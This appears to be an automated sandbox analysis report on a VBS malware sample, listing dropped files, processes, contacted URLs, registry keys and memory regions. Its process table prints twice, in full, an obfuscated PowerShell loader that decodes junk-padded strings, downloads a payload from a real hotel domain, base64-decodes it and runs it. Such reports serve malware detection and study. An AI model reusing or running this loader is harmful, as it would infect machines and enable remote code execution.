Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Kostenvoranschlag.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar1xfkvw.0r3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bn4i2qzd.up3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsvimkjj.k0z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjevjoqm.b0s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Commandoes.Gre
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping Horm5zl_6637.6637.6637.657e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens
Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11)
{$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function
Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml
RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK
meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm
Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd
Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe)
Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1
ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma]
Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls
ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv
BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S
bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA
.eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL
Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg
alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR
ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers
'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa
f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini
stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir
Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd=
elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$
O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF
UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge
.arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT
isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi
uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation)
{Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar
=Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r
stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn
esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln
rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo
ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH
drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu
csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne
(Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde
StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS
prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul
iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello
Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe
te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri
Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi
eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta
');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9
Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una
VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne
$Pylorous69;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens
Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11)
{$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function
Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml
RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK
meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm
Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd
Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe)
Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1
ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma]
Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls
ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv
BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S
bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA
.eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL
Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg
alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR
ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers
'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa
f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini
stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir
Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd=
elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$
O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF
UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge
.arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT
isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi
uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation)
{Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar
=Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r
stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn
esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln
rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo
ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH
drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu
csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne
(Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde
StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS
prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul
iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello
Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe
te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri
Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi
eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta
');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9
Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una
VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne
$Pylorous69;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://hotelseneca.ro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.hotelseneca.ro
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://www.hotelseneca.ro/Perspectivist.snpP
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.hotelseneca.ro/Perspectivist.snpXR
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://crl.micro#
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.hotelseneca.ro/Perspectivist.snp
|
185.181.240.15
|
||
|
https://www.hotelseneca.ro/Perspectivist.snpmuim
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://crl.microsoftP
|
unknown
|
||
|
https://www.hotelseneca.ro
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
Horm5zl_6637.6637.6637.657e
|
unknown
|
|
|
|
www.hotelseneca.ro
|
unknown
|
|
|
|
hotelseneca.ro
|
185.181.240.15
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.181.240.15
|
hotelseneca.ro
|
Romania
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5A5D000
|
trusted library allocation
|
page read and write
|
|
|
|
88A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
A45F000
|
direct allocation
|
page execute and read and write
|
|
|
|
16773913000
|
trusted library allocation
|
page read and write
|
|
|
|
88B0000
|
direct allocation
|
page read and write
|
||
|
1E15D448000
|
heap
|
page read and write
|
||
|
167738B0000
|
trusted library allocation
|
page read and write
|
||
|
1E15D475000
|
heap
|
page read and write
|
||
|
1E15D390000
|
heap
|
page read and write
|
||
|
16765379000
|
trusted library allocation
|
page read and write
|
||
|
1E15F193000
|
heap
|
page read and write
|
||
|
4898000
|
trusted library allocation
|
page read and write
|
||
|
45C5D8B000
|
stack
|
page read and write
|
||
|
1E15D48D000
|
heap
|
page read and write
|
||
|
784C000
|
stack
|
page read and write
|
||
|
45C51BE000
|
stack
|
page read and write
|
||
|
87D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
16761BB0000
|
heap
|
page read and write
|
||
|
45C4AFE000
|
stack
|
page read and write
|
||
|
B931EFF000
|
stack
|
page read and write
|
||
|
7FFAACC31000
|
trusted library allocation
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
7FFAACB30000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC80000
|
trusted library allocation
|
page read and write
|
||
|
1E15F1F1000
|
heap
|
page read and write
|
||
|
8200000
|
trusted library allocation
|
page read and write
|
||
|
1E15F35B000
|
heap
|
page read and write
|
||
|
1E15F158000
|
heap
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
7FFAACC20000
|
trusted library allocation
|
page read and write
|
||
|
1E15F250000
|
heap
|
page read and write
|
||
|
1677BE7C000
|
heap
|
page read and write
|
||
|
240627B0000
|
heap
|
page read and write
|
||
|
B931FFE000
|
stack
|
page read and write
|
||
|
1676463C000
|
trusted library allocation
|
page read and write
|
||
|
1E15D443000
|
heap
|
page read and write
|
||
|
1E15D3B9000
|
heap
|
page read and write
|
||
|
1677BF76000
|
heap
|
page read and write
|
||
|
16764618000
|
trusted library allocation
|
page read and write
|
||
|
1E15F18C000
|
heap
|
page read and write
|
||
|
1677BF5A000
|
heap
|
page read and write
|
||
|
2DB3000
|
heap
|
page read and write
|
||
|
1E15F221000
|
heap
|
page read and write
|
||
|
7FFAACB36000
|
trusted library allocation
|
page read and write
|
||
|
16773B9C000
|
trusted library allocation
|
page read and write
|
||
|
167653B4000
|
trusted library allocation
|
page read and write
|
||
|
81E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1677BE60000
|
heap
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
7495000
|
heap
|
page read and write
|
||
|
1677BF63000
|
heap
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
1E15F157000
|
heap
|
page read and write
|
||
|
1E15F174000
|
heap
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15F6DD000
|
heap
|
page read and write
|
||
|
45C4CFE000
|
stack
|
page read and write
|
||
|
240627C7000
|
heap
|
page read and write
|
||
|
1E15F23B000
|
heap
|
page read and write
|
||
|
81D7000
|
stack
|
page read and write
|
||
|
B9325FD000
|
stack
|
page read and write
|
||
|
1E15D46E000
|
heap
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAA0000
|
trusted library allocation
|
page read and write
|
||
|
1677BE78000
|
heap
|
page read and write
|
||
|
73F9000
|
heap
|
page read and write
|
||
|
16761F75000
|
heap
|
page read and write
|
||
|
16763926000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC39000
|
trusted library allocation
|
page read and write
|
||
|
74B5000
|
heap
|
page read and write
|
||
|
1E15F186000
|
heap
|
page read and write
|
||
|
16763DB8000
|
trusted library allocation
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15F215000
|
heap
|
page read and write
|
||
|
1E15F210000
|
heap
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
1E15F241000
|
heap
|
page read and write
|
||
|
1E15D47C000
|
heap
|
page read and write
|
||
|
1E15F1DD000
|
heap
|
page read and write
|
||
|
45C4D7E000
|
stack
|
page read and write
|
||
|
45C513F000
|
stack
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
9A5F000
|
direct allocation
|
page execute and read and write
|
||
|
1E15F151000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
16761C63000
|
heap
|
page read and write
|
||
|
48EC000
|
stack
|
page read and write
|
||
|
7F7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15D484000
|
heap
|
page read and write
|
||
|
45C4B7E000
|
stack
|
page read and write
|
||
|
1E15F1E0000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
24062B50000
|
heap
|
page read and write
|
||
|
16763EE1000
|
trusted library allocation
|
page read and write
|
||
|
82D0000
|
trusted library allocation
|
page read and write
|
||
|
1E15F235000
|
heap
|
page read and write
|
||
|
1E15F1AB000
|
heap
|
page read and write
|
||
|
7FFAACA90000
|
trusted library allocation
|
page read and write
|
||
|
45C5E0B000
|
stack
|
page read and write
|
||
|
1E15F351000
|
heap
|
page read and write
|
||
|
16763620000
|
trusted library allocation
|
page read and write
|
||
|
45C4C7C000
|
stack
|
page read and write
|
||
|
1E15F6C0000
|
heap
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
8340000
|
trusted library allocation
|
page read and write
|
||
|
16761C5E000
|
heap
|
page read and write
|
||
|
1E15F218000
|
heap
|
page read and write
|
||
|
7DF49AD00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15F177000
|
heap
|
page read and write
|
||
|
1677BEA2000
|
heap
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
1E15F314000
|
heap
|
page read and write
|
||
|
1E15F35A000
|
heap
|
page read and write
|
||
|
905F000
|
direct allocation
|
page execute and read and write
|
||
|
1E15D3CF000
|
heap
|
page read and write
|
||
|
1E15F184000
|
heap
|
page read and write
|
||
|
1E15F1BB000
|
heap
|
page read and write
|
||
|
2FD0000
|
trusted library allocation
|
page read and write
|
||
|
167658E3000
|
trusted library allocation
|
page read and write
|
||
|
1E15D46C000
|
heap
|
page read and write
|
||
|
